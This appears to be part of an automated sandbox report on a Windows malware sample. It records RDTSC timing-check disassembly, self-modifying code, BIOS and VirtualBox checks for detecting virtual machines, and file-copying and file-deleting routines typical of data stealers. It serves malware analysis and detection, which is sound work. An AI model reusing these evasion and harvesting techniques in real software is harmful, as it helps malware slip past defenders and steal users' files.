Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5C3B4 second address: F5C3C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FC220745DF6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F601B0 second address: F601B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F601B6 second address: F601D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007FC220745DF6h 0x00000015 popad 0x00000016 jmp 00007FC220745DFAh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5F6F0 second address: F5F707 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC221A94B32h 0x00000008 jg 00007FC221A94B26h 0x0000000e jne 00007FC221A94B26h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5F707 second address: F5F711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5F711 second address: F5F724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnc 00007FC221A94B26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5F724 second address: F5F73C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC220745E02h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5F885 second address: F5F89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007FC221A94B31h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5FCA9 second address: F5FCF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC220745E05h 0x0000000a jmp 00007FC220745E06h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FC220745E0Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5FCF9 second address: F5FCFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5FE43 second address: F5FE63 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jno 00007FC220745DFEh 0x00000010 jo 00007FC220745DFCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F64996 second address: F649B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC221A94B37h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F66027 second address: F66043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745DFBh 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FC220745DF6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F66043 second address: F66047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C3CE second address: F6C3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC220745E03h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C3E9 second address: F6C3F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C58B second address: F6C591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C591 second address: F6C595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6CC13 second address: F6CC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6D375 second address: F6D379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6D379 second address: F6D38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC220745DF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6D9F6 second address: F6DA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6DA04 second address: F6DA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC220745DF6h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F74BB0 second address: F74BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC221A94B26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F74BBA second address: F74BBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F74BBE second address: F74BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC221A94B35h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F74BDE second address: F74BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F818C4 second address: F818C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F81492 second address: F8149F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8149F second address: F814AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F814AB second address: F814AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F814AF second address: F814B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F83D78 second address: F83DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745E03h 0x00000009 pop edi 0x0000000a push edi 0x0000000b jmp 00007FC220745DFFh 0x00000010 jbe 00007FC220745DF6h 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8AEB6 second address: F8AEC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8AEC2 second address: F8AEE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC220745DFCh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FC220745E18h 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007FC220745DF6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8AEE8 second address: F8AEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8AEEC second address: F8AEF2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F973C9 second address: F973CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9A879 second address: F9A87D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA01FF second address: FA0205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9ED30 second address: F9ED35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9EFD5 second address: F9F01B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC221A94B40h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007FC221A94B26h 0x00000019 jmp 00007FC221A94B33h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9F01B second address: F9F03A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9F03A second address: F9F040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9F040 second address: F9F044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9F044 second address: F9F04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9F04A second address: F9F068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC220745E08h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9F068 second address: F9F06C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9F317 second address: F9F31B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9F31B second address: F9F32E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jnp 00007FC221A94B26h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9F5D8 second address: F9F5E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC220745DF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA3EBE second address: FA3EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA3EC2 second address: FA3ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA3ECA second address: FA3ECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBD345 second address: FBD363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745E07h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCE7CF second address: FCE7FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FC221A94B36h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FC221A94B2Bh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCE7FA second address: FCE802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF1D6 second address: FCF1DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF4C8 second address: FCF4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745DFBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF4D7 second address: FCF4DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF4DB second address: FCF4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FC220745DF6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF4E9 second address: FCF4F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FC221A94B26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF4F9 second address: FCF510 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC220745DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC220745DFDh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD0DE7 second address: FD0E2A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC221A94B37h 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FC221A94B26h 0x00000019 jmp 00007FC221A94B38h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD24DB second address: FD24F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD4E2C second address: FD4E36 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD4E36 second address: FD4E3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD4E3C second address: FD4E4F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD4E4F second address: FD4E55 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD5150 second address: FD5159 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD539D second address: FD53A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD53A4 second address: FD53AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD53AA second address: FD53AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD53AE second address: FD53F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dh, 1Ah 0x0000000d push dword ptr [ebp+122D2FA7h] 0x00000013 mov edx, dword ptr [ebp+122D1910h] 0x00000019 call 00007FC221A94B29h 0x0000001e jmp 00007FC221A94B35h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jne 00007FC221A94B28h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD53F0 second address: FD5417 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FC220745E00h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC220745DFAh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD5417 second address: FD545C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FC221A94B2Ch 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 jns 00007FC221A94B39h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD545C second address: FD5460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD6E55 second address: FD6E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC221A94B26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD6E5F second address: FD6E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD69A0 second address: FD69A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD69A4 second address: FD69AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 561032F second address: 561034B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 call 00007FC221A94B2Bh 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 561034B second address: 561035C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745DFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 561035C second address: 5610362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF780D second address: EF7811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D51A4B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D4F5BE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: EFC629 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: F774E8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00B038B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B04910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00B04910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00AFDA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00AFE430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00AFED20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B04570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00B04570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B03EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00B03EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00AFF6B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00AF16D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00AFDE10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00AFBE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF1160 GetSystemInfo,ExitProcess, 0_2_00AF1160
Source: file.exe, file.exe, 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
